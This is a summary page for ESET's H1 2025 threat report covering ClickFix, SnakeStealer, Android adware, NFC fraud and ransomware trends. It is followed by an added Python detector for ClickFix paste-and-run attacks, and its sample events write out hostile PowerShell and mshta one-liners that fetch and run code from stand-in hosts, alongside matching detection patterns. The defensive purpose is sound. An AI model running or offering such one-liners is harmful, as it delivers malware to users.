ESET Threat Report H1 2025

The H1 2025 ESET Threat Report documents rapid shifts in the threat landscape—highlighting the explosive rise of ClickFix social engineering, SnakeStealer’s emergence as the top infostealer, Android adware surges driven by Kaleidoscope, and a dramatic increase in NFC fraud. It also covers coordinated disruptions of Lumma Stealer and Danabot, growing ransomware infighting (including RansomHub and DragonForce), and key telemetry changes such as a 517% rise in ClickFix detections and a 160% jump in Android adware. #ClickFix #SnakeStealer

Keypoints

  • Typical report structure: Foreword (executive framing and author remarks), Threat landscape trends (detailed case studies and emerging vectors), Threat telemetry (quantitative detection and trend charts), Research publications (deep dives and investigations), About this report (methodology and data sources), About ESET and credits (organization background and contributors).
  • What each main section typically discusses: Foreword highlights major themes; Threat landscape trends breaks out prominent campaigns, new techniques, and platform-specific threats; Threat telemetry presents percentage changes and comparative charts; Research publications summarize technical analyses and notable operations; About sections explain data collection, exclusions, and limitations.
  • ClickFix: a social engineering vector that rose 517% between H2 2024 and H1 2025, now ~8% of blocked attacks and the second most common vector after phishing; a fake error or verification prompt tells the user to copy a command and paste it into a terminal or the Run dialog, and the pasted one-liner then fetches and runs a payload: infostealers, ransomware, RATs, cryptominers, and nation-state malware have all been delivered this way.
  • Infostealer dynamics: Agent Tesla declined while SnakeStealer (Snake Keylogger / 404 Keylogger) became the most-detected infostealer; coordinated disruption operations targeted Lumma Stealer and Danabot, showing effective cross-industry and law-enforcement action.
  • Android threats: adware detections up 160%, driven by Kaleidoscope’s “evil twin” scheme—pairing benign store apps with malicious clones in third-party stores to push intrusive ads and degrade device performance.
  • NFC fraud evolution: NFC-related scams increased more than thirty-five-fold, going from roughly one detection per week to dozens per week; new relay and phishing techniques (e.g., NGate, GhostTap, SuperCard) demonstrate attackers adapting to defenses.
  • Ransomware landscape: ransomware detections rose 30% while ransom payments fell, which the report attributes to takedowns, exit scams, and eroded trust in operators; at the same time, public infighting (notably by DragonForce) disrupted major RaaS players such as RansomHub.
  • Telemetry highlights (H1 2025 versus H2 2024): overall detections decreased by 3%; Android detections increased by 62%; cryptocurrency-focused threats dropped 26%; ransomware increased 30%. Together these point to a shift in platform focus and attacker priorities.
  • Operational takeaways: ClickFix’s simplicity and believability make social engineering highly effective; attackers rapidly copy successful techniques across platforms, underscoring the need for timely user warnings and execution-time safeguards (for example, warning before a pasted command runs, analogous to the prompts shown for Office macros and files with a web mark of origin).
  • Threat actor and ecosystem trends: continued prominence of malware-as-a-service models, frequent turnover among infostealer families, and opportunistic reuse of toolkits by financially motivated groups and nation-state-aligned actors.
  • Law enforcement and industry cooperation: multinational disruptions (ESET with Microsoft, FBI, Europol, etc.) successfully degraded Lumma and Danabot operations—highlighting the effectiveness of coordinated takedowns in reducing exfiltration and infrastructure resilience.
  • Recurring themes: social engineering innovation, mobile-first monetization (adware/PUA), exploitation of emerging tech (NFC), and fragmentation plus public infighting in the ransomware ecosystem.
  • Notable technical findings and research: UEFI Secure Boot bypass (CVE-2024-7344), supply-chain compromise (PlushDaemon), espionage campaigns (MirrorFace, FishMonger, BladedFeline), and novel toolsets (SparrowDoor, Spellbinder) illustrate both opportunistic and targeted advanced threats.
  • Data caveats and methodology: statistics are based on ESET global telemetry, generally exclude PUAs/adware unless specified, emphasize trend lines over absolute counts, and include platform-specific nuances where stated.
  • Impactful recommendations implied by the report: prioritize user education against social-engineering vectors like ClickFix, strengthen mobile app vetting and third-party store monitoring, enhance NFC transaction protections, maintain cross-sector incident-sharing, and support law-enforcement disruption efforts.
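The ClickFix points above describe the attack from the user's side; a defender sees it as a process-creation event in which the desktop shell or a console spawns an interpreter that fetches remote content. The following is an added detection example written for this page, not code from ESET or the report. It scores Sysmon-style process-creation events (field names `UtcTime`, `User`, `ParentImage`, `Image`, `CommandLine` follow Sysmon Event ID 1) against indicators typical of pasted one-liners. The indicator list, weights, alert threshold and the sample events are all assumptions constructed for the example, not ESET telemetry.

```python
"""Flag ClickFix-style paste-and-run process creations from JSON-lines
Sysmon-like events. Added example for this page; not the report's code.
All thresholds, parent/child lists and sample events are assumptions."""
import json
import ntpath
import re

# Parents under which a user-initiated paste typically lands (assumption):
# the Run dialog is hosted by explorer.exe, the rest are consoles.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe",
                       "pwsh.exe", "windowsterminal.exe"}

# Interpreters and download tools commonly abused by pasted one-liners.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
           "curl.exe", "certutil.exe", "bitsadmin.exe"}

# (name, weight, pattern). A single download cradle or remote HTA is enough
# to alert; the weaker flags need a second indicator. Weights are assumptions.
INDICATORS = [
    ("encoded_command", 1, re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    ("hidden_window",   1, re.compile(r"(?i)\s-(w|win|windowstyle)\s+hidden")),
    ("bypass_policy",   1, re.compile(r"(?i)\s-(ep|executionpolicy)\s+bypass")),
    ("download_cradle", 2, re.compile(r"(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b.*\b(iex|invoke-expression)\b")),
    ("remote_hta",      2, re.compile(r"(?i)\bmshta(\.exe)?\s+\"?https?://")),
    ("curl_fetch",      1, re.compile(r"(?i)\bcurl(\.exe)?\s.*https?://")),
]
ALERT_THRESHOLD = 2


def _basename(path):
    """Lower-case file name of a Windows path; works on any host OS."""
    return ntpath.basename(path or "").lower()


def score_event(event):
    """Return (score, [indicator names]) for one process-creation event.

    Events whose parent is not an interactive shell/desktop, or whose image
    is not an interpreter, score 0 here: a paste-and-run lure has to pass
    through one of those, and other parent chains belong to other rules.
    """
    parent = _basename(event.get("ParentImage"))
    image = _basename(event.get("Image"))
    if parent not in INTERACTIVE_PARENTS or image not in LOLBINS:
        return 0, []
    cmd = event.get("CommandLine", "")
    hits = [(name, weight) for name, weight, rx in INDICATORS if rx.search(cmd)]
    return sum(w for _, w in hits), [n for n, _ in hits]


def scan(lines):
    """Parse JSON-lines events and return alerts at or above the threshold."""
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        score, names = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({
                "utc": ev.get("UtcTime"), "user": ev.get("User"),
                "parent": _basename(ev.get("ParentImage")),
                "image": _basename(ev.get("Image")),
                "score": score, "indicators": names,
                "cmd": ev.get("CommandLine", ""),
            })
    return alerts


# Constructed sample events (not real telemetry). Events 1, 2 and 5 are
# paste-and-run shapes; 3 is a benign admin command; 4 has the same
# command line as 5 but a service parent, so this rule leaves it alone.
SAMPLE_EVENTS = r'''
{"UtcTime":"2025-03-04 10:12:01","User":"CORP\\jdoe","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -w hidden -ep bypass -c \"iwr http://203.0.113.5/v.txt -UseBasicParsing | iex\""}
{"UtcTime":"2025-03-04 10:15:44","User":"CORP\\jdoe","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta https://203.0.113.9/verify.html"}
{"UtcTime":"2025-03-04 10:20:13","User":"CORP\\admin","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -NoProfile -Command Get-Date"}
{"UtcTime":"2025-03-04 10:22:50","User":"NT AUTHORITY\\SYSTEM","ParentImage":"C:\\Windows\\System32\\svchost.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"UtcTime":"2025-03-04 10:31:07","User":"CORP\\jdoe","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
'''

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS.splitlines()):
        print(f"{a['utc']} {a['user']} {a['parent']}->{a['image']} "
              f"score={a['score']} {a['indicators']}: {a['cmd']}")
```

The parent filter is what makes this a ClickFix rule rather than a generic suspicious-PowerShell rule: the same encoded, hidden-window command is ignored when a service spawns it (event 4) and flagged when it comes from the desktop shell (event 5). In production the `curl_fetch` indicator is the noisy one and would be tuned per environment, and the rule should be paired with a preventive control of the kind the report calls for, such as a warning before a pasted command executes.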
Source: Awesome Annual Security Reports - The reports in this collection are limited to content which does not require a paid subscription, membership, or service contract. (https://github.com/jacobdjwilson/awesome-annual-security-reports/)

Download Report from Github